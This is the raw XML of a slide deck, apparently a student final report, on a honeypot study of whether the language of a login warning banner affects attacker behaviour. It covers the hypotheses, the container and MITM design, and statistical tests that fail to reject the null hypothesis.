      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="229306" y="734753"/>
          <a:ext cx="2063762" cy="13104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ANOVA test </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="267689" y="773136"/>
        <a:ext cx="1986996" cy="1233723"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C00F5D47-1E9E-EC4C-AC8F-6870787D2B78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2538288" y="496467"/>
          <a:ext cx="2063762" cy="13104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5C519-96E6-9649-8B22-22F188954FE9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2767595" y="714309"/>
          <a:ext cx="2063762" cy="13104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T-test</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2805978" y="752692"/>
        <a:ext cx="1986996" cy="1233723"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5116C2E3-3CF6-DA41-A222-01E43BD36FC5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5044753" y="516911"/>
          <a:ext cx="2063762" cy="13104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51DBB-8BD5-EF44-91AB-0C77B22977A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5274060" y="734753"/>
          <a:ext cx="2063762" cy="13104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Chi-squared</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5312443" y="773136"/>
        <a:ext cx="1986996" cy="123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D22FA-8066-8D40-A198-6D9C25D3C88A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1251"/>
          <a:ext cx="733782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B78B74-3791-EC4F-96EE-60A135C2EEAC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1251"/>
          <a:ext cx="7337823" cy="85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ANOVA test </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1251"/>
        <a:ext cx="7337823" cy="853217"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5E8D341B-471A-1644-BA9D-C6D2C1FB67A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="854468"/>
          <a:ext cx="733782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10000"/>
              <a:lumOff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BE05F8-F2A5-984F-A3E6-0D2A8BE66ED6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="854468"/>
          <a:ext cx="7337823" cy="85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to analyze variation between there or more groups of means </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="854468"/>
        <a:ext cx="7337823" cy="853217"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6712454E-1A52-0B46-9280-A8F093592677}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1707685"/>
          <a:ext cx="733782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4D9D74-5824-DA4C-8009-A253B457153E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1707685"/>
          <a:ext cx="7337823" cy="85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0" y="1707685"/>
        <a:ext cx="7337823" cy="853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1A0D-34AB-814C-8787-7AA8029B3A04}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="423179"/>
          <a:ext cx="7338060" cy="111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There is no significant difference in complexity of an attack based on the warning banner used </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="54373" y="477552"/>
        <a:ext cx="7229314" cy="1005094"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DF2830F-5E0F-F14D-8791-1EA9CA4536F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1617659"/>
          <a:ext cx="7338060" cy="111384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Failed to reject the null hypothesis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="54373" y="1672032"/>
        <a:ext cx="7229314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D02B8-0232-4932-B953-EBB98C71C501}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="318107" y="308655"/>
          <a:ext cx="988628" cy="988628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69554-6532-44CF-9E36-194BB6B8EFB6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="528799" y="519346"/>
          <a:ext cx="567246" cy="567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19F86-23AC-41B4-BF3B-F116968C11FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2070" y="1605217"/>
          <a:ext cx="1620703" cy="64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New statistical tools and methods for analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2070" y="1605217"/>
        <a:ext cx="1620703" cy="648281"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6F3C06DD-0812-48BD-BB9F-DBEB2A6E4B80}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2222433" y="308655"/>
          <a:ext cx="988628" cy="988628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32D54-5BB9-412B-8FD5-C82ADFBB274D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2433125" y="519346"/>
          <a:ext cx="567246" cy="567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F698-5553-4C70-922E-5EF892343AA7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1906396" y="1605217"/>
          <a:ext cx="1620703" cy="64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Connecting Python and Bash scripts</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1906396" y="1605217"/>
        <a:ext cx="1620703" cy="648281"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F8692A68-B2BC-422E-8E86-CEEE6BC411D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126760" y="308655"/>
          <a:ext cx="988628" cy="988628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BF40C-0ED4-4D99-9799-A6C69B7153FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4337451" y="519346"/>
          <a:ext cx="567246" cy="567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FC4B4-4A53-4C5A-B66E-16991C790098}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3810723" y="1605217"/>
          <a:ext cx="1620703" cy="64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Automatically backing up data to Google Drive and Sheets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3810723" y="1605217"/>
        <a:ext cx="1620703" cy="648281"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0FCF3BFF-15C0-4B80-A727-9A113B35883E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6031086" y="308655"/>
          <a:ext cx="988628" cy="988628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60794-F92C-4ADE-91B9-7B234B024FE6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6241777" y="519346"/>
          <a:ext cx="567246" cy="567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01742-BA1B-4C4D-9F28-0C58CF20CF43}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5715049" y="1605217"/>
          <a:ext cx="1620703" cy="64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Project management and adapting to feedback</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5715049" y="1605217"/>
        <a:ext cx="1620703" cy="64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4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0ed1d8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0ed1d8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0ed1d8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0ed1d8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10667" spc="267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3556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556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56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49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3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10667" b="0" spc="267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3556">
                <a:solidFill>
                  <a:schemeClr val="tx2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3733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3733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5689">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr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867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133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1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800">
                <a:latin typeface="Corbel"/>
              </a:rPr>
              <a:t>Final report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:latin typeface="Corbe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sz="3550">
                <a:latin typeface="Arial Nova"/>
                <a:cs typeface="Aharoni"/>
              </a:rPr>
              <a:t>1I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3550">
                <a:latin typeface="Cabrel"/>
                <a:cs typeface="Aharoni"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3550">
                <a:latin typeface="Corbel"/>
                <a:cs typeface="Aharoni"/>
              </a:rPr>
              <a:t>Let's Go Phishing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AFB9-7406-8947-95B8-E267173C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</p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data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3ACEE-6D69-4C46-8D3C-24B3C4E17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61554"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="902493" y="1857446"/>
          <a:ext cx="7337823" cy="256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67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AFB9-7406-8947-95B8-E267173C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</p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data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3ACEE-6D69-4C46-8D3C-24B3C4E17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288817"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="902493" y="1857446"/>
          <a:ext cx="7337823" cy="256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FA009B-68F0-E84F-BD14-45A752AA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9801"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1009765" y="3779520"/>
          <a:ext cx="6610236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05118">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1346759117"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3305118">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="476230932"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="469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Attack Complexity = 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Command Complexity = 0.0215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9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1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225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2735"/>
            <a:ext cx="3514725" cy="1229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DAFB9-7406-8947-95B8-E267173C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213132"/>
            <a:ext cx="2753156" cy="113157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624-950F-5B4C-B208-06C792DD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07" y="1508760"/>
            <a:ext cx="2757509" cy="315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T-Test test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Used to analyze variation between two groups of means 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92" y="0"/>
            <a:ext cx="567510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B1D6D3-0B77-E547-88B2-970D433F8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89690"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3946776" y="1523031"/>
          <a:ext cx="4712703" cy="2066354"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="1427603">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2507323522"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1642551">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1844438331"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1642549">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1346703849"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="77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Language 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12" marR="17912" marT="17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Attack Complexity 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12" marR="17912" marT="17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 Complexity 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12" marR="17912" marT="17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497887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Chinese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04131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​​0.149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1.386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34550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0.453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0.477</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="17912" marR="17912" marT="17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7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225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2735"/>
            <a:ext cx="3514725" cy="1229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DAFB9-7406-8947-95B8-E267173C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213132"/>
            <a:ext cx="2753156" cy="113157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624-950F-5B4C-B208-06C792DD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07" y="1508760"/>
            <a:ext cx="2757509" cy="315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Chi-Squared test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Used to analyze difference between expected and observed values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92" y="0"/>
            <a:ext cx="567510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47E51-2CFC-8841-8D2A-A66524069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75719"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3946776" y="1465170"/>
          <a:ext cx="4712702" cy="2182075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="1380287">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2292630651"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1876488">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2833015948"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1455927">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="558179143"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="436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18154" marR="18154" marT="1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</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18154" marR="18154" marT="1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 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18154" marR="18154" marT="1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28481"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43641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3.471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71294"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43641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Chinese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407891"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43641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3.182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59938"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43641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3.303</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18154" marR="18154" marT="181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71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8A0D-4BCE-6448-B2FB-E139E131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F1B73-C1A1-4A16-B845-CDB4D94DA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738107"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="902189" y="1508760"/>
          <a:ext cx="7338060" cy="315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71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B726-9586-7745-8772-5E891CE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</p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lessons Learned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804460-91A7-4E39-B74C-7B2EBAAA6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226302"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="902493" y="1857446"/>
          <a:ext cx="7337823" cy="256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28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BA77-951C-4283-A623-1BD216B1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Overview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7A6B-E181-4B8E-978C-3391A59D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77" y="1411888"/>
            <a:ext cx="6428881" cy="8947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Studying attacker behavior between 4 honeypots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Varied by the language of their warning banner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6D6A82-B123-49A4-B03B-BA989BEA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46" y="3277176"/>
            <a:ext cx="5247376" cy="61278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6D3095F-E37B-420A-BFE1-E28193F7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61" y="3977173"/>
            <a:ext cx="5248405" cy="88104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E23D67E-3330-485D-B600-0481E89B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409" y="2304122"/>
            <a:ext cx="5248406" cy="8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4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450D50C-C7A3-A041-9D2F-259A8C7394A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697341" y="1942190"/>
            <a:ext cx="5749319" cy="2079310"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43356"/>
              <a:gd name="adj2" fmla="val 86247"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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21D51-D856-479E-BB25-BA731E0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Research Question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027F1EC-7D70-4B1E-9210-75DD81C11D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2025880" y="2469811"/>
            <a:ext cx="5083835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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel"/>
              </a:rPr>
              <a:t>How does the language of a warning banner on a computer system affect the behavior of an attacker on this system?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378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A465-A2B4-4C70-B905-82AC0AC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 Question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8177955-4169-4E81-AC4E-F6E3A53C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21" y="3133497"/>
            <a:ext cx="1255620" cy="125562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3CCDD28-E133-4387-8AB3-ED40D56C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3" y="3196531"/>
            <a:ext cx="1129553" cy="1129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6DE17-1C88-450B-8184-D5A2F4928A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145397" y="1485900"/>
            <a:ext cx="4281206" cy="12731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orbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>​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Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> There is no significant difference in attack complexity based on the language of the warning banner used in a computer system.​</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0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D80A6-8A2B-4D92-82D6-AFFF7C915E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683779" y="1485900"/>
            <a:ext cx="4281206" cy="12745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orbel"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Alternative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel"/>
                <a:cs typeface="Segoe UI"/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Corbel"/>
              </a:rPr>
              <a:t> There is a significant difference in attack complexity based on the language of the warning banner used in a computer system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" panose="020B0503020204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280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025239F-A6FB-43A8-BD4A-3FB7C0B4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32081"/>
            <a:ext cx="9141714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225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2735"/>
            <a:ext cx="3514725" cy="1229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B46E-7F2A-4176-BB1C-1D2A8266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213132"/>
            <a:ext cx="2753156" cy="1131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500">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Honeypot Design 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F6BF2-17FB-45E8-B316-6B1417009DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102895" y="1780265"/>
            <a:ext cx="2757509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Allowed only 1 attacker per container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Restarted MITM instances after attacker logout or 10 minutes of inactivity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Placed warning banner before login using MITM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Randomized warning banners on containers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92" y="0"/>
            <a:ext cx="567510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8E67B3-35D8-4F8F-986F-2DB88C608324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3806775" y="1120822"/>
            <a:ext cx="5045175" cy="2901855"/>
            <a:chOff x="1545665" y="900480"/>
            <a:chExt cx="5780754" cy="388298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E68E0C-7346-45A3-A25B-512581D631B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1637853" y="2034823"/>
              <a:ext cx="5599404" cy="21960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9F91A6-8F5C-47C9-9844-9B7373507965}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4031370" y="3756218"/>
              <a:ext cx="837938" cy="1027251"/>
              <a:chOff x="6020104" y="3627784"/>
              <a:chExt cx="651535" cy="840372"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="Picture 8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B76A1DC-32A5-4CDE-ACE6-91FD9EDFD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20105" y="3627784"/>
                <a:ext cx="651534" cy="65153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2607C53-7B50-44BD-833A-FB3B5CFD759D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6020104" y="4279317"/>
                <a:ext cx="651534" cy="1888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200"/>
                  <a:t>Host VM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379B26-B7F2-4AA3-9668-9C3C591A74E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3090034" y="3409150"/>
              <a:ext cx="949751" cy="803124"/>
              <a:chOff x="5093248" y="2684275"/>
              <a:chExt cx="711723" cy="583631"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Picture 8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30526A1-1AC8-40BB-8CF7-504956CB0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2711" y="2684275"/>
                <a:ext cx="352799" cy="352799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21978F2-9433-44C5-9B6B-BE5CEBB44447}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5093248" y="3037074"/>
                <a:ext cx="711723" cy="2308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Container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B83693-568C-4A8E-968D-ABDD60EF3790}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6376668" y="3417226"/>
              <a:ext cx="949751" cy="803124"/>
              <a:chOff x="5093248" y="2684275"/>
              <a:chExt cx="711723" cy="583631"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="Picture 7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18DD4B3-F34F-49F9-B0FB-3BCAEE371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2711" y="2684275"/>
                <a:ext cx="352799" cy="352799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A9BBCED-5E0C-4B27-AD96-D44D6A6C7CF5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5093248" y="3037074"/>
                <a:ext cx="711723" cy="2308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Container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5D1162F-5C8D-47AF-9D53-E15F34B8A284}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4869301" y="3409150"/>
              <a:ext cx="949751" cy="803124"/>
              <a:chOff x="5093248" y="2684275"/>
              <a:chExt cx="711723" cy="583631"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="77" name="Picture 7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93003D0-3412-41AE-ABC6-7C9B98A2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2711" y="2684275"/>
                <a:ext cx="352799" cy="352799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322011-CD3D-4441-AB3C-99A64F4B788E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5093248" y="3037074"/>
                <a:ext cx="711723" cy="2308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Container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E4DE74-CCFD-40CD-919B-899B11FCA7D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1545665" y="3413553"/>
              <a:ext cx="949751" cy="803124"/>
              <a:chOff x="5093248" y="2684275"/>
              <a:chExt cx="711723" cy="583631"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="75" name="Picture 7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DFECAC6-AA65-485B-9751-CF4F8FBBF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2711" y="2684275"/>
                <a:ext cx="352799" cy="352799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4842FC-466C-44F5-A685-66C92A558918}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5093248" y="3037074"/>
                <a:ext cx="711723" cy="2308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Container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D0C78C-5AC7-4D33-BBF8-4DF49A26C1D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1654940" y="2277425"/>
              <a:ext cx="695261" cy="874045"/>
              <a:chOff x="2726434" y="1599818"/>
              <a:chExt cx="695261" cy="874045"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="73" name="Picture 7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5855954-C726-4424-B576-AFE4F7231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9302" y="1599818"/>
                <a:ext cx="485480" cy="48548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EDFBF9-561F-4566-A7A0-B722B743FFD9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2726434" y="2065751"/>
                <a:ext cx="695261" cy="4081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MITM Control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FCA4C90-49D5-4B21-B9D8-338B87CA5793}"/>
                </a:ext>
              </a:extLst>
